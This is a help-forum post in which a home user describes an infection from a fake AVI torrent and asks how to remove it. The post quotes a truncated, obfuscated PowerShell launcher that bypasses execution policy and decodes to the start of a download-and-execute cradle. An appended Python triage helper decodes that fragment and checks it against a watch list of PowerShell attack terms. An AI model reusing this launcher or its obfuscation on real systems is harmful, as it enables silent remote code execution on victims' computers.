Hello all!
I made the dumb mistake of downloading what I thought was the old Grinch movie through a torrent site (we have it on DVD but my daughter scratched it up), and it turns out it wasn't what I thought it was (shocking).
It was listed as an AVI file, but when I double-clicked it I saw some PowerShell stuff flash, and my Windows Defender was turned off. I quickly shut off the internet, grabbed Malwarebytes from a different computer and installed it on the bad computer. (It's a fairly new computer with not much on it, and I also got Windows Defender turned back on by deleting some of the registry keys and restarting it....)
It scanned and quarantined and removed a handful of things, and I thought I was OK. When I use Google my search results pop up, then I can see some redirecting at the bottom of the browser to some strange sites, and then my results and whole page look different. I found a topic close to my issue, but I am still running into this issue. When I opened up the file (I removed it and deleted it from my recycle bin) here is what was listed in one of the sections....
file:///C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%20-NoPr%20-WINd%201%20-eXEc%20ByP%20-JoIN%20('73R69&88X40j78~101u119%7D45:79~98X106%7D101%7D99z116%7B32&83&121%7D115u116~101&109~46R78%7B101j116%7D46&87:101j98:67R108&105%7D101u110%7B116~41:46u68j111j119~110%7B108R111j97%7B100~83R116u11
It may be longer than that, but I'm not sure, that's all I could see....
Does anyone have any idea on how to fully remove this? I am at a loss.....
I also downloaded the Farbar recovery tool. So please let me know what I need to run or what to do, I'm all ears!
Thanks for any help
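
Added example, not part of the original post: a small Python triage helper that decodes the delimiter-separated character codes in the quoted command line so a responder can read what the shortcut was set up to run. The `WATCH` list and function names are assumptions for illustration; the input is the string exactly as quoted above, which is cut off in the post.

```python
import re
from urllib.parse import unquote

# Char-code blob copied from the file:/// URL quoted in the post. The post cuts
# it off mid-string, so the final number may be incomplete.
SAMPLE = (
    "73R69&88X40j78~101u119%7D45:79~98X106%7D101%7D99z116%7B32&83&121%7D115u116"
    "~101&109~46R78%7B101j116%7D46&87:101j98:67R108&105%7D101u110%7B116~41:46u68"
    "j111j119~110%7B108R111j97%7B100~83R116u11"
)

# Assumed triage watch list (illustrative, not exhaustive).
WATCH = ("IEX", "Invoke-Expression", "WebClient", "DownloadSt", "FromBase64String")


def decode_charcodes(blob, truncated=False):
    """Decode decimal character codes separated by arbitrary junk characters.

    Returns (text, dropped). Percent-decoding runs first; otherwise the hex
    digits inside %7B / %7D would be misread as character codes. When the
    capture is known to be cut off, the last number is dropped and returned
    separately instead of being decoded into a misleading character.
    """
    codes = re.findall(r"\d+", unquote(blob))
    dropped = codes.pop() if truncated and codes else None
    out = []
    for code in codes:
        n = int(code)
        # Show non-printable values as <n> rather than emitting control chars.
        out.append(chr(n) if 32 <= n < 127 else "<{}>".format(n))
    return "".join(out), dropped


def triage(text):
    """Return the watch-list terms present in the decoded text (case-insensitive)."""
    low = text.lower()
    return [term for term in WATCH if term.lower() in low]


if __name__ == "__main__":
    text, dropped = decode_charcodes(SAMPLE, truncated=True)
    print("decoded:", text)
    print("dropped partial code:", dropped)
    print("watch-list hits:", triage(text))
```

The decoded text is for reading only; the remainder of the command, including any URL it pointed to, is not in the post and cannot be recovered from this fragment.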